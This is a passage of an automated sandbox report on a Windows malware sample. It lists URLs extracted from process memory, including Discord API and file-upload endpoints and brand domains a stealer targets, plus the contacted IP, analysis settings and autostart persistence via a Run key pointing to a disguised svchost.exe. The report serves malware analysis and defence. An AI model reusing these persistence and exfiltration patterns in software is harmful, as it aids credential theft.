                  https://hbo.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://binance.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.gg/rMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://playstation.com)Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535Mai.exe, 00000004.00000003.2317848602.000001995E663000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2257817585.000001995E528000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2220027795.000001995E505000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://sellix.io)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/pypa/setuptools/issues/417#issuecomment-392298401Mai.exe, 00000004.00000002.2710896612.000001995E200000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.securetrust.com/STCA.crlMai.exe, 00000004.00000003.2084857083.000001995F489000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://tools.ietf.org/html/rfc6125#section-6.4.3Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://discord.com/api/v6/guilds/Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://telegram.com)zMai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cert.fnmt.es/dpcs/Mai.exe, 00000004.00000003.2204552245.000001995F4DA000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085048419.000001995F4BC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204632854.000001995F4E0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085109796.000001995F4CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://google.com/mailMai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2264338939.000001995E474000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2301099993.000001995E478000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2716427128.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2260377437.000001995E461000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2325267932.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2265641133.000001995E477000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2570619662.000001995E4E6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/jaraco/jaraco.functools/issues/5Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://pornhub.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.accv.es00Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmMai.exe, 00000004.00000003.1540360354.000001995E36E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.rfc-editor.org/info/rfc7253Mai.exe, 00000004.00000003.2554277610.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2256955753.000001995F1A9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2382446743.000001995F1B1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722046903.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2245681829.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F464000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/5uu99/rawMai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.Mai.exe, 00000004.00000003.2455637329.000001995E65C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718278386.000001995E65C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mahler:8092/site-updates.pyMai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.gofile.io/getServerrMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.orgrMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.gg/Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.firmaprofesional.com/cps0Mai.exe, 00000004.00000002.2707419898.000001995DCCB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718201292.000001995E611000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2460640379.000001995DCC3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/python/importlib_metadata/issues/396d__Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://netflix.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/urllib3/urllib3/issues/2920Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gmail.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.securetrust.com/SGCA.crl0Mai.exe, 00000004.00000003.2317848602.000001995E688000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2403793060.000001995E689000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://outlook.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com)Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cacerts.digicert.coMai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.quovadisglobal.com/cps0Mai.exe, 00000004.00000003.2187500147.000001995F2FB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2312508752.000001995F339000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252890863.000001995F2FB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://binance.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://youtube.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://spotify.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://spotify.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.iana.org/time-zones/repository/tz-link.htmlMai.exe, 00000004.00000003.1540933860.000001995E361000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://docs.python.org/library/itertools.html#recipesMai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://yahoo.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/api/users/Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.gofile.io/getServerMai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://steam.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaMai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://packaging.python.org/en/latest/specifications/declaring-project-metadata/Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2320826704.000001995E458000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552591972.000001995E403000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2305500569.000001995E44F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2334629897.000001995E45B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545696959.000001995E40E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1553018358.000001995E43E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E420000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/pypa/setuptools/issues/1024.Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/Mai.exe, 00000004.00000003.1545696959.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210091841.000001995DD62000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://hotmail.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.accv.es0Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.python.org/Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.com/Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299599683.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276009216.000001995F0A0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2393139003.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hbo.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.quovadisglobal.com/cpsMai.exe, 00000004.00000003.2321410286.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2554277610.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2588079315.000001995F484000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.26.3.16
                  		rentry.coUnited States
                  		13335CLOUDFLARENETUStrue

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1504078
                  Start date and time:2024-09-04 14:25:28 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 14m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:52
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:4wx72yFLka.exe
                  renamed because original name is a hash value
                  Original Sample Name:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a.exe
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.evad.winEXE@62/1169@1/2
                  EGA Information:
                  • Successful, ratio: 42.9%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 178
                  • Number of non-executed functions: 187
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe
                  • Excluded IPs from analysis (whitelisted): 184.28.90.27
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, crl3.digicert.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target main.exe, PID 7676 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 3828 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 7008 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 7772 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtReadFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  08:26:40API Interceptor2x Sleep call for process: WMIC.exe modified
                  08:26:55API Interceptor3x Sleep call for process: svchost.exe modified
                  14:26:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UpdateTask C:\Users\user\AppData\Roaming\svchost.exe
                  14:26:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UpdateTask C:\Users\user\AppData\Roaming\svchost.exe
                  14:27:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.26.3.16quotation.jsGet hashmaliciousUnknownBrowse
                    Quote.jsGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                            CV.vbsGet hashmaliciousXmrigBrowse
                              system47.exeGet hashmaliciousXWormBrowse
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                  file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                    S982i1J0Uk.msiGet hashmaliciousUnknownBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
